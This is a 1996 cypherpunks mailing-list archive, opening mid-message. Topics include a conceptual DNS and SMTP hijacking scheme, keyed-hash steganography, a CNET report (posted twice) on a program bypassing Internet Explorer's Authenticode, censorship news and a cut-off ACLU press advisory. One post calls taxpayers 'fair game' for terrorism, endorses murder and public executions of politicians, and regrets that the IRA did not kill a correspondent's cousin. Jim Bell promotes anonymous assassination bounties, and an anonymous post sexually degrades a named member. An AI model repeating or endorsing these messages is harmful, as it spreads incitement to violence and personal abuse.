203.28.52.181 that you're asking for and an SMTP relay hack that
forwards the mail while keeping copies for itself.  (Even if you're running 
SSL encrypted, it can probably still play active eavesdropper, knowing who's
talking to 203.28.52.181, though it can't read the encrypted packets.
If SSL is currently including IP addresses in the encrypted information
to reduce spoofing, it can still at least hose the conversation.)
Your ISP will cache this, so the next time somebody wants to talk to
skeeve.net, it'll take care of that for them.

This really doesn't work well for targets on aol.com, compuserve.com, 
prodigy.com, ix.netcom.com, worldnet.att.net, and uunet.net
that are a bit big to filter all the traffic for, of course,
but it catches most of the interesting people.

4) If they _do_ participate in the Network Access Points
(e.g. fnords.net, on one of the Metropolitan Area Exchange
FDDI rings, is really a CIA plant) they could probably sniff packets
for people they don't have peering arrangements with.
If you don't see the fnords, they won't eat your packets.
If you do see the fnords, they will eat your packets, so you won't see them.
This doesn't work as well for switch-based NAPs such as
Big Hairy Routers or ATM switches, but ATM Virtual Circuits
have fnords all over them anyway; that's why there are _5_ bytes in the header.


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Tue, 24 Sep 1996 15:01:47 +0800
To: Mike McNally <m5@vail.tivoli.com>
Subject: Re: Bernstein hearing: The Press Release
In-Reply-To: <32472AF1.1417@vail.tivoli.com>
Message-ID: <Pine.3.89.9609231910.A22804-0100000@netcom15>
MIME-Version: 1.0
Content-Type: text/plain





On Mon, 23 Sep 1996, Mike McNally wrote:

> Lucky Green wrote:
> >
> > Yes, you can be sued for sexual harrasment for trying to pick up a
> > stranger in a bar, should that stranger still feel bothered by your
> > advances while at work the next day.
> > 
> > The courts have ruled,
> 
> To paraphrase the probably-great Charles Haynes, "my bullshit meter 
> is jiggling up near the red line".  Is there really a case of a person
> being convicted of workplace sexual harassment against somebody they
> didn't work with?

Not that I am aware of. But the test *clearly* is how it makes you feel 
once at work, regardless of other circumstances.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Tue, 24 Sep 1996 05:50:26 +0800
To: cypherpunks@toad.com
Subject: The periodic word of advice about Timmy C. Maypole, the pathological liar
Message-ID: <199609231805.UAA28245@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


When Timmy C. Maypole's mother gave birth to him after 
fucking with a bunch of sailors, she didn't know who the 
father was but decided to tell him that he was a Russian 
as the Russian sailor was the one who satisfied her the 
most.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Miller <jim@suite.suite.com>
Date: Tue, 24 Sep 1996 17:35:18 +0800
To: steve@edmweb.com
Subject: Re: really undetectable crypto made somewhat practical
In-Reply-To: <Pine.BSF.3.91.960918231937.568B-100000@bitbucket.edmweb.com>
Message-ID: <9609240307.AA02627@suite.com>
MIME-Version: 1.0
Content-Type: text/plain



> I'm on FCPUNX instead of regular Cypherpunks, so please
> excuse me if I'm a little behind the thread.
>
Few on the cypherpunk list replied to my post, so you didn't miss  
anything important.


> Instead of hashing just the word in an effort to get stego
> bits, you could hash a key along with the word. In order to
> get the intended hash you would need to know the key. Since
> you're probably hashing a whole block of 512 bits (or
> whatever's specified in the algorithm) appending a key
> should not affect the speed of the system. I'm certain
> that this would increase the security, possibly enough
> that you wouldn't need to use a regular encryption
> algorithm (but I wouldn't bet on it).
>

I like your suggestion, although not for the reason you suggested it  
(although your use is a good idea, too). The use of keyed hashes solves  
one of the problems I saw with my scheme.  The main problem I saw with my  
scheme was that it might be possible to detect that an innocuous message  
was conveying a hidden encrypted message by analyzing the statistical  
properties of the relevant hash bits.

Problem:

If the words in a message are chosen so some of their hash bits (say, 4  
bits per hash) combine to form an encrypted message, then those combined  
hash bits would be suspiciously cryptographically random, whereas the  
combined hash bits of a message that was not created for the purpose of  
conveying an encrypted message would not necessarily be cryptographically  
random.  It is conceivable that a program could be written that uses  
this difference to test if a message is conveying a hidden encrypted  
message.

Solution:

Rather than using an unkeyed hash, which gives Eve the ability to  
generate the relevant block of combined hash bits and test them for  
certain properties, use a keyed hash.  Since Eve does not know the key  
used to hash the words in the message, she will not be able to generate  
the relevant block of combined hash bits and will not be able to perform  
meaningful analysis of the properties of those bits.


Further analysis:

By hashing words and then using only the first 4 hash bits, what you are  
really doing is sorting all words into 16 groups.  Group 0 consists of  
all words whose first four hash bits are 0000, group 1 consists of all  
words whose first four hash bits are 0001, ..., group 15 consists of all  
words whose first four hash bits are 1111.

If a message is constructed by selecting words so their first 4 hash  
bits combine to form an encrypted message, then, if the message is long  
enough or you send enough messages, you will probably select words  
"evenly" from each of the 16 word groups.  However, I can think of no  
reason to assume the distribution of group selections would be "even" for  
normal messages.  Maybe, by some weird fluke, normal messages are mostly  
constructed from words in groups 1, 3, 4, 9, and 14, for example.

By using a keyed hash, your not stuck using a fixed set of word groups.   
A different hash key will sort the words into different groups.  Hash  
keys effectively prevent Eve from knowing which words in your message  
came from which groups, thus preventing her from determining if words  
were chosen "evenly" from each group.

Jim_Miller@suite.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 24 Sep 1996 17:06:16 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: AP [was: Re: Kiddie porn on the Internet] [NOISE]
In-Reply-To: <6XJquD10w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.960923194435.15255A-100000@crl2.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Mon, 23 Sep 1996, Dr.Dimitri Vulis KOTM wrote:

> There is no such thing as an "ordinary citizen". When the U.S. commits
> war crimes in Korea, Viet Nam, Grenada, Panama, Somalia, Iraq, and elsewhere,
> every American taxpayer is an accomplice and a fair game.

Illogical collectivist claptrap.  When a taxpayer is targeted by 
terrorists, he has been victimized twice--first by the government 
that stole his money, second by the terrorist that punished him
for the (alleged) acts others commited with that money.  If a
mugger buys a gun with the money he took from me, am I then
responsible for the murder he commits with it?  Clearly not.  
This line of "reasoning" is nothing more than a sad variant of 
the old, "blame the victim" game.  For shame.

Let's bring this back to crypto for a moment.  Dimitri's "logic"
must necessarily lead one to the conclusion that Cypherpunks (at
least those in the US) are responsible for whatever draconian
restrictions "our" government puts on free speech, crypto or
whatever.  John Gilmore, Philip Zimmermann, Whit Diffie and 
others will be chagrined to learn this, I'm sure.

Dimitri needs to learn what it means to be an adult.  Everyone is 
totally responsible for what they do, but ONLY for what THEY do.  
No one is responsible for the unassisted, willful acts of others.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 24 Sep 1996 17:34:15 +0800
To: hallam@vesuvius.ai.mit.edu
Subject: Re: AP  [NOISE]
Message-ID: <199609240323.UAA02037@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:10 PM 9/23/96 -0400, hallam@vesuvius.ai.mit.edu wrote:
>
>Jim,
>
>	I do support the presence of troops in Northern Ireland and
>do not consider that to contradict my belief that there should be a
>united, autonamous Ireland. I do not believe that the "loyalists" are
>in fact loyal to the British way of life, any more than the KKK are
>representative of the US south.
>
>	Troops are in Northern Ireland for a very simple and depressing
>reason. People like Jim want to impose their will on others by force.

Quite the contrary.  I want to reduce, as much as possible, the ability of 
people to impose their will on others by force.  Read my essay.  Eventually 
you might figure it out.  

The difference is, I recognize that if you set up a government to try to 
minimize non-government violence and coercion, you'll get just that:  A 
minimization of NON-GOVERNMENT violence and coercion, at the expense of 
vastly increasing the GOVERNMENT kind.  And I don't consider that progress 
at all.

>Despite prolonged attempts by each faction to assasinate the leaders of
>the other they have been unsuccessful. 

I suppose it didn't occur to you that this is EXACTLY why this dispute has 
gone on so long?  What if instead of being "unsuccessful," these attempts 
suddenly became 100% successful.  Easy, even.  Just push a button and the 
top guy on the other side dies.  And you could do this as often as, say, 
once an hour, with all of his replacements.  And the other side can do the 
same to your leadership.  How long do you think it would be before people 
decide that maybe, they DON'T want to "step up to the plate" and get killed 
for the sake of their cause?


>If terrorists trained by Lybia
>and Syria are unable to assasinate at will then we can be sure thaqt Jim's
>band of kooks is not going to get any further.

Which means that you clearly don't understand the motivating factor of a 
large, totally anonymous e-cash payment.  And why should a handful of 
"terrorists" be successful?  The "AP gang" will consist of 5 BILLION people 
who want to collect the reward, including anyone close to the target.  It'll 
put an entirely new, ominous meaning into the phrase, "Friends and Family"!  
  B^)

>If the integration of both Irealand and the UK into the European
>Union has not ended the situation the complete lack of government
>will not either. 

Hell, the whole reason for this dispute is heirarchical social systems, in 
this case governments and religions!  And adding the European Union merely 
increases the problem by adding to the heirarchy.  My solution eliminates 
the heirarchy, totally.  Why, then, should EU's failure imply a failure by 
AP?  It's the diametrically opposite tactic.

>	It is suprising that someone from the press has not seized upon Jims
>ideas as cause for another cyber-scare. I suspect this is because people
>like Markof are somewhat more responsible. 

No, it's probably because they think, nervously, that I might just be right. 
 Even that won't necessarily want to make them want to associate their names 
with my ideas.  If they truly understand them, they'll recognize that it'll 
happen regardless of the amount of approval it gets from polite society. 

>This is not going to stop me
>from producing an op-ed piece linkiing the net libertarians to assasination
>politics unless I hear a few more repudiations of Bell's ideas.

A doubt whether most people feel themselves obligated to repudiate a 
proposal, particularly if they don't know that it won't constitute an 
improvement over the status quo.  On the other hand, if the world engineers 
a good, permanent solution to the Northern Ireland problem in the next six 
months, as well as the Middle East problem, the India/Pakistan problem, the 
Chechnya problem, the North/South Korea problem and a few other heretofore 
intractable problems, you can start feeling confident that my "extreme" 
solution will be avoidable.  Until then, don't get your hopes up.

>If you
>don't very clearly reject his murderous ideas you are going to regret it
>just as the left regreted having the USSR or the RAF associated with them.
>		Phill

Time will be the best judge of this, I think.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Tue, 24 Sep 1996 10:52:10 +0800
To: cypherpunks@toad.com
Subject: Security flaw in Microsft Explorer
Message-ID: <199609231826.UAA16049@internal-mail.systemics.com>
MIME-Version: 1.0
Content-Type: text/plain




                     Program compromises IE security 
                     By Nick Wingfield
                     September 23, 1996, 10:45 a.m. PT 

                                A start-up Internet company has posted a
                     program on the Net that could allow Web sites to bypass
                     the security controls in Internet Explorer, CNET has
                     learned. 

                     The company, InfoSpace, created a program aimed at Net
                     search engines such as Lycos and Excite that want to
                     become the default search engine in Microsoft's Internet
                     Explorer 3.0. But the program, which is actually featured on
                     the Lycos Web site, manages to circumvent Explorer's
                     security warning window--an action that could let
                     InfoSpace sneak programs onto a user's personal computer
                     without warning. 

                     Although the InfoSpace program apparently was not created
                     with malicious intent, it underscores the fragility of Internet
                     Explorer's security defenses, as well as broader security
                     issues related to downloading software over the Internet. 

                     The InfoSpace program sidesteps a security feature in
                     Internet Explorer, called Authenticode, which is designed to
                     allow users to verify the origins of a piece of software code,
                     such as an ActiveX control, a script, or a plug-in. The
                     Authenticode system requires a user to entrust the
                     developer of a program, whether it's InfoSpace, Lotus
                     Development, or IBM, not to install viruses or other
                     destructive programs on the user's system. 

                     Although Authenticode does not prevent software
                     developers from creating such programs, they can be held
                     legally accountable for bad code. That's because the
                     programs contain "digital signatures," a sort of ID card that
                     allows perpetrators to be tracked down by law enforcement
                     agencies. Microsoft works with VeriSign to provide digital
                     signatures for programs. 

                     Last month, VeriSign took matters into its own hands by
                     asking a developer, Fred McLain, to remove an ActiveX
                     control called Exploder from his Web site. The Exploder
                     control was designed to crash a user's computer after
                     downloading. 

                     "Code signing is not a guarantee of code quality," Charles
                     Fitzgerald, a product manager at Microsoft said. "It's an
                     accountability trail." 

                     As with all digitally signed programs, users are offered the
                     option to accept or to reject the InfoSpace program before
                     installing it on their systems. Users are also offered the
                     option to bypass the Authenticode warning window for all
                     InfoSpace programs in the future. 

                     But the company's program registers InfoSpace as a
                     "trusted publisher" in Explorer, effectively opening the
                     browser to intrusions. The operation is akin to inviting a
                     guest over to your house for dinner and having them copy
                     the key to your front door without permission. 

                     InfoSpace executives denied that there was any malice
                     intended in its program, adding that it has provided Lycos
                     with an updated version of the code. Lycos plans to post the
                     new program later this evening, according to InfoSpace.

                     "It was a bug that got incorporated into the production
                     code," InfoSpace CEO Naveen Jain said. 

                     Lycos CEO Bob Davis said he was not aware of the bug in
                     the InfoSpace program and could not comment on it. The
                     program is identified as Lycos Quick Search on the search
                     engine's site. 

                     However, Microsoft officials expressed concern, saying it is
                     hard to defend against once a user has consented to
                     download code from the Net. 

                     "Clearly their software is doing something a tad
                     aggressive," said Rob Price, a group program manager for
                     Internet security at Microsoft."[With Authenticode], users
                     are making a one-time trust decision, this is a persistent
                     trust decision." 

                     Microsoft argued that Explorer provides better security than
                     Netscape Communications' Navigator, which does not
                     currently allow digital signatures on plug-ins. In Explorer,
                     users are warned before downloading code even if the
                     program does not contain a digital signature, though the
                     source of the program is not identified. 

                     In contrast to plug-in software and ActiveX controls, Java
                     applets are prevented from damaging a user's computer
                     through built-in restrictions in the Java Virtual Machine. 

                     "Java is the model for dynamic executable content on the
                     Net," said Eric Greenberg, group security manager at
                     Netscape. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tank <tank@xs4all.nl>
Date: Tue, 24 Sep 1996 16:37:46 +0800
To: tank@xs4all.nl (tank)
Subject: We removed radikal 154 from xs4all :(
Message-ID: <199609231831.UAA21914@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


Hi all,

We have temporary removed radikal 154 from xs4all.  

We did this because the german ICTF and BAW continued to stop IP-traffic  
to and from xs4all. They not only blocked the web-server (with more than  
3100 homepages from users and compagnies) but 2 Class C-networks. The
pressure was to high for both xs4all and it costumers (more than 12500    
users). They were not able to mail, ftp, www in large parts of germany.
The 47 mirrors of the radikal site made it possible for us to remove issue
154 from xs4all.

All 47 mirrors are still accessable by german netizens. There is no
filtering of traffic to these servers.

The ICTF and BAW now have to deceide if they will block all ip-traffic to 
and from all 47 servers, or they have to stop their censoring actions. In
both cases we will put the issue radikal 154 back online.

We are still calling for more mirrors. The more mirrors, the more pressure
on the ICTF and BAW to stop their censorship. You can get a copy of the
who archive from ftp://utopia.hacktic.nl/pub/replay/pub/incoming or from  
one of the mirror-sites.

regards,
henk (SPG)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 24 Sep 1996 19:36:07 +0800
To: cypherpunks@toad.com
Subject: Hallam-Baker demands more repudiations or he'll write!
Message-ID: <ae6ca7190a021004d21c@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:10 AM 9/24/96, hallam@vesuvius.ai.mit.edu wrote:

>like Markof are somewhat more responsible. This is not going to stop me
>from producing an op-ed piece linkiing the net libertarians to assasination
>politics unless I hear a few more repudiations of Bell's ideas. If you
>don't very clearly reject his murderous ideas you are going to regret it
>just as the left regreted having the USSR or the RAF associated with them.

I for one don't respond well to extortion threats, so write your damned article.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Omegaman <omegaman@bigeasy.com>
Date: Tue, 24 Sep 1996 13:32:01 +0800
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Snake-Oil FAQ
In-Reply-To: <3245E50C.4B10@gte.net>
Message-ID: <Pine.LNX.3.95.960923202054.213A-100000@jolietjake.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 22 Sep 1996, Dale Thorn wrote:
 
> Maybe I shouldn't have tried to (slightly) change the subject.  It was 
> my thought that someone could encourage the person(s) who wanted to do a 
> Snake-Oil product list to generalize the list, to be a more scholarly 
> reference, and not just a blacklist.  Since the original(?) proposal 
> concerned actual products, and not just techniques which fit into neatly 
> identifiable categories, that might justify a Consumer Reports type of 
> review list for these products.
> 

  One of the goals of a "Snake-Oil FAQ" as proposed is to gain as wide a
distribution as possible.  If a "blacklist" of products is put into the FAQ,
or if actual existing products are referred to a negative light, the
distribution of this FAQ will be severely limited.

  I also think that as a whole, this project is a good idea and a good
mini-project.  As crypto continues to spread, it is inevitable that "bad"
crypto will spread as well.  While these products will surely come and go
with the phases of the moon, some people will be undoubtedly be suckered and
soured towards crypto-technology in general. 

(sarcasm) "If it saves just one...." (\sarcasm) 

  It has been said before that the best way to counter noise is with signal.

  If one of the primary goals of cypherpunks is to encourage the widespread
use of strong crypto, then, by extension, it is important to discourage the
spread of "crappy crypto."

_______________________________________________________________
 Omegaman <mailto: omega@bigeasy.com>
 PGP Key fingerprint =  6D 31 C3 00 77 8C D1 C2
                        59 0A 01 E3 AF 81 94 63
 Send e-mail with "get key" in the "Subject:" field
 to get a copy of my public key
_______________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: latin1

iQCVAwUBMkc7Gab3EfJTqNC9AQGBywP+M037TzDBjy/F5MgmKv+x/9lhQrnQsMQ6
xlOB3ApjLHZvoKI//PyHoCKiuCw9BVnTskAE16iu19yWZmUWNL3S6hsOFxex1MMU
pf6YQSajpE4mOSsih8j+b2T60ERXx/jz2BAwGEjtf4azCuGUxObUgX75ydmLoNft
Po4HbyimOtY=
=Yg1d
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "R. J. Harvey" <harveyrj@vt.edu>
Date: Tue, 24 Sep 1996 11:26:45 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Bernstein hearing: The Press Release
Message-ID: <2.2.32.19960924003804.00f487f8@mail.vt.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 02:59 PM 9/23/96 -0700, Lucky Green wrote:
>Yes, you can be sued for sexual harrasment for trying to pick up a
>stranger in a bar, should that stranger still feel bothered by your
>advances while at work the next day. 
>
>The courts have ruled,
>
   Let's see some citations.  Only if the two people
involved are employed by the same employer might
such an argument apply, and even then it's a long
stretch under a "hostile work environment" argument.  
Cite a case in which individuals working for DIFFERENT
employers successfully brought such a ridiculous suit.
There's no way.

rj





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 24 Sep 1996 15:34:50 +0800
To: cypherpunks@toad.com
Subject: Re: AP [was: Re: Kiddie porn on the Internet] [NOISE]
In-Reply-To: <9609232148.AA17056@vesuvius.ai.mit.edu>
Message-ID: <6XJquD10w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


hallam@vesuvius.ai.mit.edu writes:
> So Jim Bell is opposed to "truly random attacks on ordinary citizens"
> Its this type ofappoligia for terrorism that disgusts me utterly.

There is no such thing as an "ordinary citizen". When the U.S. commits
war crimes in Korea, Viet Nam, Grenada, Panama, Somalia, Iraq, and elsewhere,
every American taxpayer is an accomplice and a fair game. Likewise, any
Britih subject is fair game for IRA's self-defense against centuries of
British genocide and oppression.

> He is calling for murder but wants to dress it up in whatever psychotic
> justifications he can.

Murder can be justified.

> He is also completely wrong. When the IRA attemoted to assasinate my cousin
> I was in no way intimidated and neither was he. He continued as a senior
> poitician for over a decade despite continued danger. I can think of no
> less effective method of bringing about change in attitudes.

I think public executions of politicians would be a more effective way
to indimidate the potential successors than covert assassinations.
Joe Stalin liked public hangings toward the end of his life. I'd rather
see the bastards hang in a nationally televised ceremony, live from the
Rose Garden, but I guess -- whatever gets the job done.

It's a pity the IRA didn't nail your cousin. I wish them better luck next time.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rod@wired.com (Roderick Simpson)
Date: Tue, 24 Sep 1996 19:31:25 +0800
To: cypherpunks@toad.com
Subject: Barlow/Taylor censorship debate
Message-ID: <v02140b0fae6ca0cd3b6d@[204.62.132.248]>
MIME-Version: 1.0
Content-Type: text/plain


Come join in John Perry Barlow's Brain Tennis debate
(www.wired.com/braintennis/) versus CDA supporter and president of the
National Law Center for Children and Families, Bruce Taylor, over
government censorship and free speech. Taylor has also been a Justice
lawyer and prosecutor for the city of Cleveland, where he prosecuted, among
others, Larry Flint.

Their debate will last from today through next Wednesday, October 2.

To post, go to:

http://www.hotwired.com/cgi-bin/interact/replies_all?msg.25733

See you there!

Roderick Simpson
Associate Producer
Wired Online







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 24 Sep 1996 12:27:09 +0800
To: haggis@brutus.bright.net (Hamish)
Subject: Re: Taking crypto out of the U.S.
In-Reply-To: <v01540b00ae6c79f1fbfd@[205.212.124.167]>
Message-ID: <199609240225.VAA04788@homeport.org>
MIME-Version: 1.0
Content-Type: text


Theres a personal use exemption.  Michael Froomkin's web page has a
pointer to it.

Adam

Hamish wrote:

|         Soon I am going to be going overseas to Japan, and I want to take
| my notebook with me so I can keep up with everything, however, I have
| encrypted my hard drive and usually encrypt my mail.  Is this in violation
| of the ITAR to keep everything the same when I go over?
| 
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gary@systemics.com
Date: Tue, 24 Sep 1996 15:00:04 +0800
Subject: No Subject
Message-ID: <199609240458.VAA29783@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>From cypherpunks-errors@toad.com  Tue Sep 24 00:06:48 1996
Return-Path: cypherpunks-errors@toad.com
Received: from toad.com (toad.com [140.174.2.1]) by oak.westol.com (8.7.5/8.6.9) with ESMTP id AAA15647 for <shadseek@westol.com>; Tue, 24 Sep 1996 00:06:48 -0400
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id LAA23286 for cypherpunks-outgoing; Mon, 23 Sep 1996 11:26:23 -0700 (PDT)
Received: from smokey.systemics.com (smokey.systemics.com [193.67.124.65]) by toad.com (8.7.5/8.7.3) with SMTP id LAA23280 for <cypherpunks@toad.com>; Mon, 23 Sep 1996 11:26:14 -0700 (PDT)
Received: from internal-mail.systemics.com (kp1HuXoYZnhRYRtN5QVHP59VjfL1vS2Z@internal-mail.systemics.com [193.67.124.74]) by smokey.systemics.com (8.6.12/8.6.12) with ESMTP id UAA10263 for <cypherpunks@toad.com>; Mon, 23 Sep 1996 20:26:00 +0200
Received: (from gary@localhost) by internal-mail.systemics.com id UAA16049 for cypherpunks@toad.com; Mon, 23 Sep 1996 20:26:40 +0200
Date: Mon, 23 Sep 1996 20:26:40 +0200
From: Gary Howland <gary@systemics.com>
Message-Id: <199609231826.UAA16049@internal-mail.systemics.com>
To: cypherpunks@toad.com
Reply-To: gary@systemics.com
Subject: Security flaw in Microsft Explorer
Sender: owner-cypherpunks@toad.com
Precedence: bulk
X-UIDL: 843538362.000
Status: U



                     Program compromises IE security 
                     By Nick Wingfield
                     September 23, 1996, 10:45 a.m. PT 

                                A start-up Internet company has posted a
                     program on the Net that could allow Web sites to bypass
                     the security controls in Internet Explorer, CNET has
                     learned. 

                     The company, InfoSpace, created a program aimed at Net
                     search engines such as Lycos and Excite that want to
                     become the default search engine in Microsoft's Internet
                     Explorer 3.0. But the program, which is actually featured on
                     the Lycos Web site, manages to circumvent Explorer's
                     security warning window--an action that could let
                     InfoSpace sneak programs onto a user's personal computer
                     without warning. 

                     Although the InfoSpace program apparently was not created
                     with malicious intent, it underscores the fragility of Internet
                     Explorer's security defenses, as well as broader security
                     issues related to downloading software over the Internet. 

                     The InfoSpace program sidesteps a security feature in
                     Internet Explorer, called Authenticode, which is designed to
                     allow users to verify the origins of a piece of software code,
                     such as an ActiveX control, a script, or a plug-in. The
                     Authenticode system requires a user to entrust the
                     developer of a program, whether it's InfoSpace, Lotus
                     Development, or IBM, not to install viruses or other
                     destructive programs on the user's system. 

                     Although Authenticode does not prevent software
                     developers from creating such programs, they can be held
                     legally accountable for bad code. That's because the
                     programs contain "digital signatures," a sort of ID card that
                     allows perpetrators to be tracked down by law enforcement
                     agencies. Microsoft works with VeriSign to provide digital
                     signatures for programs. 

                     Last month, VeriSign took matters into its own hands by
                     asking a developer, Fred McLain, to remove an ActiveX
                     control called Exploder from his Web site. The Exploder
                     control was designed to crash a user's computer after
                     downloading. 

                     "Code signing is not a guarantee of code quality," Charles
                     Fitzgerald, a product manager at Microsoft said. "It's an
                     accountability trail." 

                     As with all digitally signed programs, users are offered the
                     option to accept or to reject the InfoSpace program before
                     installing it on their systems. Users are also offered the
                     option to bypass the Authenticode warning window for all
                     InfoSpace programs in the future. 

                     But the company's program registers InfoSpace as a
                     "trusted publisher" in Explorer, effectively opening the
                     browser to intrusions. The operation is akin to inviting a
                     guest over to your house for dinner and having them copy
                     the key to your front door without permission. 

                     InfoSpace executives denied that there was any malice
                     intended in its program, adding that it has provided Lycos
                     with an updated version of the code. Lycos plans to post the
                     new program later this evening, according to InfoSpace.

                     "It was a bug that got incorporated into the production
                     code," InfoSpace CEO Naveen Jain said. 

                     Lycos CEO Bob Davis said he was not aware of the bug in
                     the InfoSpace program and could not comment on it. The
                     program is identified as Lycos Quick Search on the search
                     engine's site. 

                     However, Microsoft officials expressed concern, saying it is
                     hard to defend against once a user has consented to
                     download code from the Net. 

                     "Clearly their software is doing something a tad
                     aggressive," said Rob Price, a group program manager for
                     Internet security at Microsoft."[With Authenticode], users
                     are making a one-time trust decision, this is a persistent
                     trust decision." 

                     Microsoft argued that Explorer provides better security than
                     Netscape Communications' Navigator, which does not
                     currently allow digital signatures on plug-ins. In Explorer,
                     users are warned before downloading code even if the
                     program does not contain a digital signature, though the
                     source of the program is not identified. 

                     In contrast to plug-in software and ActiveX controls, Java
                     applets are prevented from damaging a user's computer
                     through built-in restrictions in the Java Virtual Machine. 

                     "Java is the model for dynamic executable content on the
                     Net," said Eric Greenberg, group security manager at
                     Netscape. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: camcc@abraxis.com
Date: Tue, 24 Sep 1996 15:01:54 +0800
Subject: No Subject
Message-ID: <199609240458.VAA29784@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>From cypherpunks-errors@toad.com  Tue Sep 24 00:20:12 1996
Return-Path: cypherpunks-errors@toad.com
Received: from toad.com (toad.com [140.174.2.1]) by oak.westol.com (8.7.5/8.6.9) with ESMTP id AAA16114 for <shadseek@westol.com>; Tue, 24 Sep 1996 00:20:11 -0400
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id MAA24022 for cypherpunks-outgoing; Mon, 23 Sep 1996 12:43:09 -0700 (PDT)
Received: from smtp1.abraxis.com (SMTP1.ABRAXIS.COM [206.155.199.210]) by toad.com (8.7.5/8.7.3) with SMTP id MAA23992 for <cypherpunks@toad.com>; Mon, 23 Sep 1996 12:41:23 -0700 (PDT)
From: camcc@abraxis.com
Received: from [206.155.199.39] by smtp1.abraxis.com (NTMail 3.01.03) id ua044324; Mon, 23 Sep 1996 15:44:56 -0400
Message-Id: <2.2.32.19960923194301.0069bebc@smtp1.abraxis.com>
X-Sender: camcc@smtp1.abraxis.com
X-Mailer: Windows Eudora Pro Version 2.2 (32)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Mon, 23 Sep 1996 15:43:01 -0400
To: cypherpunks@toad.com
Reply-To: camcc@abraxis.com
Subject: GA HB1630 Lawsuit:  Press Advisory
Sender: owner-cypherpunks@toad.com
Precedence: bulk
X-UIDL: 843538926.000
Status: U

>X-Sender: rcostner@intergate.net

>Reply-To: efg-action@ninja.techwood.org
>
>Joint Media Advisory: 
>
>AMERICAN CIVIL LIBERTIES UNION 
>ELECTRONIC FRONTIERS GEORGIA
>REP. MITCHELL KAYE
>
>Groups to Mount Legal Challenge to Georgia Cyberspace Law
>
>FOR IMMEDIATE RELEASE	Contact: See list below
>Friday, September 20, 1996	
>
>	ATLANTA, GA-- -The American Civil Liberties Union, Electronic Frontiers
>Georgia, Georgia State Representative Mitchell Kaye (R-Marietta) and others
>will be holding a news conference on Tuesday, September 24 at 10:30 a.m.,
>immediately after filing a lawsuit seeking a preliminary injunction against a
>Georgia law barring communications in cyberspace.  
>
>	The suit names Governor Zell Miller and Attorney General Michael Bowers as 
>defendants, and will be filed on behalf of 13 plaintiffs.
>------------------------------------------------------------------------------
>--------------------------------------
>
>     WHO:	
>
>Attorneys Ann Beeson (ACLU) and Scott McClain (Bondurant, Mixson & Elmore)
>		
>Plaintiffs Robert Costner (executive director, Electronic Frontiers Georgia);
>Jeff Graham (AIDS Survival Project); Rep. Mitchell Kaye (GA House of
>Representatives); Bonnie Nadri (The Page Factory);  Teresa Nelson (ACLU of
>Georgia); Eric Van Pelt  (Atlanta Veterans Alliance); Josh Riley (individual
